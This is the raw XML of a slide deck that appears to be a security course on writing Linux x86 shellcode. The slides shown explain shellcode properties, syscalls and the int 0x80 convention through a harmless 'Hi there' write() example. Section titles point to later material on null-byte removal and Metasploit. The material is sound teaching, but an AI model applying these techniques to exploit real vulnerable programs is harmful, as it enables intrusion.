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74" r:id="rId2"/>
    <p:sldId id="375" r:id="rId3"/>
    <p:sldId id="329" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="330" r:id="rId6"/>
    <p:sldId id="364" r:id="rId7"/>
    <p:sldId id="332" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="341" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="337" r:id="rId12"/>
    <p:sldId id="333" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="335" r:id="rId16"/>
    <p:sldId id="334" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="361" r:id="rId19"/>
    <p:sldId id="306" r:id="rId20"/>
    <p:sldId id="305" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="307" r:id="rId23"/>
    <p:sldId id="301" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="302" r:id="rId26"/>
    <p:sldId id="356" r:id="rId27"/>
    <p:sldId id="353" r:id="rId28"/>
    <p:sldId id="354" r:id="rId29"/>
    <p:sldId id="275" r:id="rId30"/>
    <p:sldId id="282" r:id="rId31"/>
    <p:sldId id="349" r:id="rId32"/>
    <p:sldId id="348" r:id="rId33"/>
    <p:sldId id="350" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="357" r:id="rId37"/>
    <p:sldId id="326" r:id="rId38"/>
    <p:sldId id="336" r:id="rId39"/>
    <p:sldId id="318" r:id="rId40"/>
    <p:sldId id="319" r:id="rId41"/>
    <p:sldId id="342" r:id="rId42"/>
    <p:sldId id="320" r:id="rId43"/>
    <p:sldId id="355" r:id="rId44"/>
    <p:sldId id="321" r:id="rId45"/>
    <p:sldId id="343" r:id="rId46"/>
    <p:sldId id="327" r:id="rId47"/>
    <p:sldId id="351" r:id="rId48"/>
    <p:sldId id="338" r:id="rId49"/>
    <p:sldId id="352" r:id="rId50"/>
    <p:sldId id="339" r:id="rId51"/>
    <p:sldId id="324" r:id="rId52"/>
    <p:sldId id="286" r:id="rId53"/>
    <p:sldId id="297" r:id="rId54"/>
    <p:sldId id="298" r:id="rId55"/>
    <p:sldId id="299" r:id="rId56"/>
    <p:sldId id="300" r:id="rId57"/>
    <p:sldId id="303" r:id="rId58"/>
    <p:sldId id="287" r:id="rId59"/>
    <p:sldId id="358" r:id="rId60"/>
    <p:sldId id="359" r:id="rId61"/>
    <p:sldId id="288" r:id="rId62"/>
    <p:sldId id="294" r:id="rId63"/>
    <p:sldId id="295" r:id="rId64"/>
    <p:sldId id="289" r:id="rId65"/>
    <p:sldId id="290" r:id="rId66"/>
    <p:sldId id="296" r:id="rId67"/>
    <p:sldId id="322" r:id="rId68"/>
    <p:sldId id="314" r:id="rId69"/>
    <p:sldId id="309" r:id="rId70"/>
    <p:sldId id="362" r:id="rId71"/>
    <p:sldId id="345" r:id="rId72"/>
    <p:sldId id="344" r:id="rId73"/>
    <p:sldId id="325" r:id="rId74"/>
    <p:sldId id="365" r:id="rId75"/>
    <p:sldId id="366" r:id="rId76"/>
    <p:sldId id="368" r:id="rId77"/>
    <p:sldId id="370" r:id="rId78"/>
    <p:sldId id="369" r:id="rId79"/>
    <p:sldId id="367" r:id="rId80"/>
    <p:sldId id="308" r:id="rId81"/>
    <p:sldId id="313" r:id="rId82"/>
    <p:sldId id="310" r:id="rId83"/>
    <p:sldId id="292" r:id="rId84"/>
    <p:sldId id="311" r:id="rId85"/>
    <p:sldId id="312" r:id="rId86"/>
    <p:sldId id="363" r:id="rId87"/>
    <p:sldId id="360" r:id="rId88"/>
    <p:sldId id="371" r:id="rId89"/>
    <p:sldId id="373" r:id="rId90"/>
    <p:sldId id="374" r:id="rId91"/>
    <p:sldId id="372" r:id="rId92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2C0AD-6BD2-4256-AC5A-EC4579D22114}">
          <p14:sldIdLst>
            <p14:sldId id="274"/>
            <p14:sldId id="375"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="shellcode" id="{3F8C0932-76D5-4928-A7DA-AF83FD9D1744}">
          <p14:sldIdLst>
            <p14:sldId id="329"/>
            <p14:sldId id="277"/>
            <p14:sldId id="330"/>
            <p14:sldId id="364"/>
            <p14:sldId id="332"/>
            <p14:sldId id="281"/>
            <p14:sldId id="341"/>
            <p14:sldId id="280"/>
            <p14:sldId id="337"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="syscalls" id="{29A3226A-3719-482F-A59B-A5BD1441B77C}">
          <p14:sldIdLst>
            <p14:sldId id="333"/>
            <p14:sldId id="279"/>
            <p14:sldId id="278"/>
            <p14:sldId id="335"/>
            <p14:sldId id="334"/>
            <p14:sldId id="304"/>
            <p14:sldId id="361"/>
            <p14:sldId id="306"/>
            <p14:sldId id="305"/>
            <p14:sldId id="340"/>
            <p14:sldId id="307"/>
            <p14:sldId id="301"/>
            <p14:sldId id="285"/>
            <p14:sldId id="302"/>
            <p14:sldId id="356"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="create shellcode" id="{A9EC78F0-5ABA-4DFD-818E-4FCB9993FF2E}">
          <p14:sldIdLst>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="275"/>
            <p14:sldId id="282"/>
            <p14:sldId id="349"/>
            <p14:sldId id="348"/>
            <p14:sldId id="350"/>
            <p14:sldId id="293"/>
            <p14:sldId id="283"/>
            <p14:sldId id="357"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="shellcode fix null" id="{F956EF07-642D-41F6-80B8-F14F8620C4D0}">
          <p14:sldIdLst>
            <p14:sldId id="326"/>
            <p14:sldId id="336"/>
            <p14:sldId id="318"/>
            <p14:sldId id="319"/>
            <p14:sldId id="342"/>
            <p14:sldId id="320"/>
            <p14:sldId id="355"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="shellcode fix reference" id="{83F38133-0DAC-4FF0-A65F-85729F0C0B19}">
          <p14:sldIdLst>
            <p14:sldId id="321"/>
            <p14:sldId id="343"/>
            <p14:sldId id="327"/>
            <p14:sldId id="351"/>
            <p14:sldId id="338"/>
            <p14:sldId id="352"/>
            <p14:sldId id="339"/>
            <p14:sldId id="324"/>
            <p14:sldId id="286"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="300"/>
            <p14:sldId id="303"/>
            <p14:sldId id="287"/>
            <p14:sldId id="358"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="fixed shellcode" id="{EF40228B-28C9-4F0C-A620-99CE95FBF788}">
          <p14:sldIdLst>
            <p14:sldId id="359"/>
            <p14:sldId id="288"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="296"/>
            <p14:sldId id="322"/>
            <p14:sldId id="314"/>
            <p14:sldId id="309"/>
            <p14:sldId id="362"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="64bit" id="{01521D83-3CB5-47B7-9D6C-2B6587DAAB84}">
          <p14:sldIdLst>
            <p14:sldId id="345"/>
            <p14:sldId id="344"/>
            <p14:sldId id="325"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="types of shellcode" id="{B298EB61-C7AB-4CD6-8879-016C6F2DE595}">
          <p14:sldIdLst>
            <p14:sldId id="365"/>
            <p14:sldId id="366"/>
            <p14:sldId id="368"/>
            <p14:sldId id="370"/>
            <p14:sldId id="369"/>
            <p14:sldId id="367"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="metasploit" id="{C8DF6576-F5DB-4186-AFE4-89FEF4217E01}">
          <p14:sldIdLst>
            <p14:sldId id="308"/>
            <p14:sldId id="313"/>
            <p14:sldId id="310"/>
            <p14:sldId id="292"/>
            <p14:sldId id="311"/>
            <p14:sldId id="312"/>
            <p14:sldId id="363"/>
            <p14:sldId id="360"/>
            <p14:sldId id="371"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="identify shellcode" id="{027358A8-6423-4DC2-BA9F-BAC13D780C90}">
          <p14:sldIdLst>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="3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bin Rutishauser" initials="D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6"/>
    <a:srgbClr val="DE8703"/>
    <a:srgbClr val="F70991"/>
    <a:srgbClr val="FF8400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444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0B7qRLuwvXbWXT1htVUVpdjRZUmc/edit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Shellcode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Shellcode Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Should be small</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Because we maybe have small buffers in the vulnerable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Position Independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Don’t know where it will be loaded in the vulnerable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No Null Characters (0x00)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> etc. will stop copying after Null bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Self-Contained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Don’t reference anything outside of shellcode</a:t>
            </a:r>
          </a:p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793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Recap:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Shellcode is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A string of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Which can be executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27643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3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Note: Next slides are in x32, not x64!</a:t>
            </a:r>
          </a:p>
          <a:p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0127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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Makes it easy to create shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Direct interface to the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Alternative:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Call LIBC code: write()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Problem: Don’t know where write() is located!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="2400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7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Lets try to write a shellcode with the write() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>To print a message: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>write(1, “Hi there”, 8);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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263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(2):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system call is the fundamental interface between an application and the Linux kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.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System calls are generally not invoked directly, but rather via wrapper functions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> […]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glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains a function truncate() which invokes the underlying "truncate" system call.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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0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445214" y="980728"/>
            <a:ext cx="50199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end, abort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process (for example, fork)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terminate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get/set process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wait for time, wait event, signal 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allocate, free memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>File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file, delete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open, close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read, write, reposition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get/set file attributes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calls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accept </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alarm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Brk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chown</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Clock_gettime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Getcwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lseek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>poll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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85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call a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall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2800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>system_call_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Arguments in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ECX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…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422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solidFill>
            <a:srgbClr val="FFC000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908720"/>
            <a:ext cx="8229600" cy="5388893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379413" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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fd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379413" lvl="1"/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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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379413" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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rgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/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</a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/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rgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379413" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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file descriptors?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stdin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1: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2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And also: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Sockets (Network)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10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5913"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Systemcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>calling convention: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:   Write(): 0x04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EBX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:   FD (file descriptor), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 0x01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ECX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:   address of string to write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:   Length of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>string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 err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 0x80: Execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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25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764704"/>
            <a:ext cx="8568952" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
